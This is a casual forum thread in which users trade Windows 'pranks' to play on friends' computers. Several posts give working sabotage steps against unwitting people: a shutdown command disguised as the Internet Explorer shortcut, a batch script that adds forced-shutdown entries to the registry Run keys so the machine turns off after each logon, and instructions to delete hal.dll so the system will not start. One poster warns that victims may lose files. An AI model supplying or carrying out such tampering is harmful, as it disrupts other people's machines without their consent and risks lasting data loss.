LOL I love annoying people with computer pranks..!
Ermm..
The best one is just creating a new shortcut..
Right-click on your desktop, and go to New, Shortcut..
Type in there, Shutdown -s -c "You have a virus"
And name that as Internet Explorer
Then right click on that icon you just made, and go to Properties, Change Icon, and change it to the one that looks like the original internet icon!!
Then delete the original Internet Explorer icon, and replace it with the one you just made!
So when they click on it, it shuts their computer off [;D]

A friend [;D]
He's devious enough to find out for himself, like I was. I found the blue screen of death screensaver and had a ball with that.

Naughty boys must play!

I find setting fire to a friends computer always brings a happy smirk, a chortle and a guffaw !!

....and even though their life's work and records and once only data is destroyed forever they always see the funny side of it too.......which is nice....

This is the "blue screen of death." I it for the NT operating system.
(https://www.thenakedscientists.com/forum/proxy.php?request=http%3A%2F%2Fi38.photobucket.com%2Falbums%2Fe111%2Fgeezer69%2Fscreenshot.gif&hash=b03b1664025c754e57a5de3c8d7748e3)
The screen saver - a free download - is available at http://www.sureshotsoftware.com/bluesaver/index.html This a program that will imitate whichever of the particular windows operating system it is installed on.
I installed this on a fiend's machine once and just left innocently. About 4 days later he called me and told me he just could not figure out what was going on. He absolutely going crazy. After listening to his tale of woe for about ten minutes and talking of possible solutions I interrupted him and said something to the effect - "you know, I think I heard from a programmer friend that while Microsoft was developing Win 95 one of their programmers made a screen saver as a prank. A guy would go the the bathroom and while he was gone his machine would "blue screen". Next time you restart your machine, first look on the web to see if that was published somewhere and find out what files are installed by this program."
20 minutes later he called me and thanked me profusely.
The story about how this screen saver first came into being is true.
But - it could cause a lot of grief as well.
-
OOOh I hate that screen! LOL! Ive seen it alot just before my computers died!
-
Hmm I can't seem to download it!
-
Sorry to be boring, but do be careful with such pranks though.
If the "victim" doesn't know what's going on they may well cause *real* damage (or loss of files etc) to their computer trying to fix the fake-problem.

Several anti-virus programs Add it into their virus definition list.

I tried to warned against it this possibility, probably not strongly enough.

Just thought I'd add another prank:)
Take a screen-grab of the desktop and then just display it full-screen, using an appropriate image display. A variation on this is to take a screen-grab of someone else's desktop and display that instead.
If you want to put a bit more effort into the prank, use the screen-grab as a basis for a full-screen PowerPoint presentation.

Nice trick, you could improve it thought by putting into the short cut:
shutdown -s -f -t 05 -c "gotcha!"
The "-f" forces programs to shutdown when the timer runs out, an added nasty surprise [:)]
Another prank, (albeit most annoying), is to execute the following code...:
@echo on
:A
set DSSKEY="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
set DSSKEY="HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
set DSSKEY="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
shutdown -s -f -t 00
exit
This should cause the computer to shutdown after 90 seconds when you've logged on. You can to stop the computer turning off is to just delete the registry values or each time just run "shutdown -a".
If you delete the following "C:\Windows\system32\hal.dll", and it will gaurantee your peer to spend quite a time working out whats gone wrong [;)]Basically, its a system file, or to be more exact, a "dynamically linked library", which mainly get executed by the system. Anyway, this one in particular communicates between the software and the hardware and is crucial to the running of the computer. As with all of the above pranks, it doesn't do any damage to files on your computer (with the exception of itself). You can use the microsoft system recovery disk to get your computer up and running again after that, or just boot off another HD and copy it accross to the HD that is missing hal.dll
You can also get a few great programs from freewarehome.com.
All the above "pranks" are only compatible with windows, and i do not condone anything you do with them
